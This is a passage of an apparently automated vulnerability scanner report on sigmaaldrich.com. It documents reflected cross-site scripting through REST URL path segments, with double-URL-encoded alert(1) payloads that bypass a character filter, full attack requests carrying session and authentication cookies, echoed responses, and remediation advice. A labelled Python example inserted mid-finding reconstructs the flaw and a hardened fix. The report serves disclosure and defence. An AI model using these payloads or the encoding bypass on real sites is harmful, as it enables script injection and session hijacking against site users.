Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:23 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content2626f";alert(1)//d734e82c357/sigma-aldrich/the-americas/united-states/ordering","E404") ;
   </script>
...[SNIP]...

1.238. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/ordering [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/ordering

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string literal delimited by double quotation marks. The payload 5ef04%2522%253balert%25281%2529%252f%252f587426c5d28 was submitted in REST URL parameter 2 and was echoed as 5ef04";alert(1)//587426c5d28 in the application's response. In that position the " closes the string literal, the ; ends the statement, alert(1) runs, and // comments out the rest of the original line.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server decodes %253c to %3c, which passes the filter, and a second decode inside the application turns it into <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it must, the value should be written out as an escaped JavaScript string literal (with ", \ and </ encoded) rather than concatenated raw. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich5ef04%2522%253balert%25281%2529%252f%252f587426c5d28/the-americas/united-states/ordering HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:25 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich5ef04";alert(1)//587426c5d28/the-americas/united-states/ordering","E404") ;
   </script>
...[SNIP]...

1.239. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/ordering [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/ordering

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string literal delimited by double quotation marks. The payload a38e8%2522%253balert%25281%2529%252f%252f9b2e188f1a0 was submitted in REST URL parameter 3 and was echoed as a38e8";alert(1)//9b2e188f1a0 in the application's response. In that position the " closes the string literal, the ; ends the statement, alert(1) runs, and // comments out the rest of the original line.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server decodes %253c to %3c, which passes the filter, and a second decode inside the application turns it into <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it must, the value should be written out as an escaped JavaScript string literal (with ", \ and </ encoded) rather than concatenated raw. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americasa38e8%2522%253balert%25281%2529%252f%252f9b2e188f1a0/united-states/ordering HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:26 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americasa38e8";alert(1)//9b2e188f1a0/united-states/ordering","E404") ;
   </script>
...[SNIP]...

1.240. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/ordering [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/ordering

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string literal delimited by double quotation marks. The payload b4c7d%2522%253balert%25281%2529%252f%252f9aa475d6dd0 was submitted in REST URL parameter 4 and was echoed as b4c7d";alert(1)//9aa475d6dd0 in the application's response. In that position the " closes the string literal, the ; ends the statement, alert(1) runs, and // comments out the rest of the original line.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server decodes %253c to %3c, which passes the filter, and a second decode inside the application turns it into <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it must, the value should be written out as an escaped JavaScript string literal (with ", \ and </ encoded) rather than concatenated raw. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas/united-statesb4c7d%2522%253balert%25281%2529%252f%252f9aa475d6dd0/ordering HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:28 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-statesb4c7d";alert(1)//9aa475d6dd0/ordering","E404") ;
   </script>
...[SNIP]...

1.241. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/ordering [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/ordering

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string literal delimited by double quotation marks. The payload bd7b0%2522%253balert%25281%2529%252f%252fe09e07d008 was submitted in REST URL parameter 5 and was echoed as bd7b0";alert(1)//e09e07d008 in the application's response. In that position the " closes the string literal, the ; ends the statement, alert(1) runs, and // comments out the rest of the original line.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server decodes %253c to %3c, which passes the filter, and a second decode inside the application turns it into <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it must, the value should be written out as an escaped JavaScript string literal (with ", \ and </ encoded) rather than concatenated raw. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
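
The Issue detail and Remediation detail paragraphs above (repeated for each finding in this report) describe one mechanism: a filter that runs on the once-decoded path, a second URL-decode in the application, and raw concatenation into a JavaScript string. The following is an added example, not code from the XSS.CX report or from sigmaaldrich.com: a hypothetical reconstruction of that vulnerable flow next to a hardened one, plus a small classifier that reports where a scanner probe landed in a captured body. The filter character set, the example.test host and the cmCreateErrorTag output format are assumptions; the probe prefix and suffix and the sample body are modelled on finding 1.235.

```python
"""Added example, not part of the XSS.CX report or of the sigmaaldrich.com
code: a hypothetical reconstruction of the double-URL-decode flaw that the
Issue detail and Remediation detail paragraphs describe, a hardened
renderer, and a classifier for where a probe landed in a response body."""
import json
import re
from urllib.parse import quote, unquote

# Probe layout used throughout the report: <prefix>";alert(1)//<suffix>.
# Prefix and suffix are the ones from finding 1.235.
PREFIX, SUFFIX = "479f7", "24dcf70337a"
PROBE = f'{PREFIX}";alert(1)//{SUFFIX}'

# Hypothetical: the characters the site's filter is assumed to reject.
BLOCKED = set('"<>\'')


def double_encode(s: str) -> str:
    """Percent-encode twice, so '"' becomes %22 and then %2522."""
    return quote(quote(s, safe=""), safe="")


def js_string_literal(s: str) -> str:
    """Emit s as a JavaScript string literal: json.dumps escapes the double
    quote, the backslash and control characters; '</' is broken up so the
    value can never close the enclosing <script> element."""
    return json.dumps(s).replace("</", "<\\/")


def vulnerable_render(raw_path: str) -> str:
    """Hypothetical vulnerable flow: the web server decodes the path once,
    the filter checks that value, then the application decodes it AGAIN
    and concatenates the result into a JS string."""
    path = unquote(raw_path)                 # web server's single decode
    if any(c in BLOCKED for c in path):      # filter sees %22, not '"'
        return 'cmCreateErrorTag("Error 400","E400") ;'
    path = unquote(path)                     # the bug: second decode after validation
    return f'cmCreateErrorTag("Error 404 | http://www.example.test{path}","E404") ;'


def hardened_render(raw_path: str) -> str:
    """Hardened flow: decode exactly once, validate that canonical value,
    and write it out as an escaped JS string literal."""
    path = unquote(raw_path)                 # canonicalise once, never twice
    if any(c in BLOCKED for c in path):      # validation after canonicalisation
        return 'cmCreateErrorTag("Error 400","E400") ;'
    literal = js_string_literal("Error 404 | http://www.example.test" + path)
    return f'cmCreateErrorTag({literal},"E404") ;'


_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def classify_reflection(body: str, prefix: str = PREFIX, suffix: str = SUFFIX) -> str:
    """Report where the probe landed:
    js-string-breakout  prefix";alert(1)//suffix appears raw inside <script>
    js-string-inert     the quote survived only escaped or still percent-encoded
    html-body           reflected, but outside any script element
    not-reflected       prefix absent from the body"""
    for m in _SCRIPT_RE.finditer(body):
        script = m.group(1)
        if f'{prefix}";alert(1)//{suffix}' in script:
            return "js-string-breakout"
        if re.search(re.escape(prefix) + r'(\\"|%22|%2522|&quot;)', script):
            return "js-string-inert"
    return "html-body" if prefix in body else "not-reflected"


# Constructed sample modelled on the 404 body shown for finding 1.235.
SAMPLE_BODY = (
    '<html><script language="JavaScript1.1">\n'
    '       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/'
    'sigma-aldrich/the-americas/united-states479f7";alert(1)//24dcf70337a/'
    'jai-nagarkatti-memoriam","E404") ;\n'
    '   </script></html>'
)

# The attack request path for parameter 4, rebuilt from the probe.
RAW_PATH = ("/content/sigma-aldrich/the-americas/united-states"
            + double_encode(PROBE) + "/jai-nagarkatti-memoriam")


def demo() -> dict:
    """Run the scenarios and classify each rendered script."""
    single = "/content/x" + quote(PROBE, safe="") + "/y"   # %22, not %2522
    return {
        "single_encoded_vs_filter": vulnerable_render(single),
        "double_encoded_vs_vulnerable": classify_reflection(
            f"<script>{vulnerable_render(RAW_PATH)}</script>"),
        "double_encoded_vs_hardened": classify_reflection(
            f"<script>{hardened_render(RAW_PATH)}</script>"),
        "captured_response": classify_reflection(SAMPLE_BODY),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The single-encoded probe is stopped by the filter because the web server's one decode already yields a literal quote; the double-encoded probe passes that check as %22 and only becomes a quote in the application's second decode. The hardened renderer keeps the same filter but decodes once and emits a JSON-escaped literal, so even a value that reaches the script cannot terminate the string or the script element.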

Request

GET /content/sigma-aldrich/the-americas/united-states/orderingbd7b0%2522%253balert%25281%2529%252f%252fe09e07d008 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; 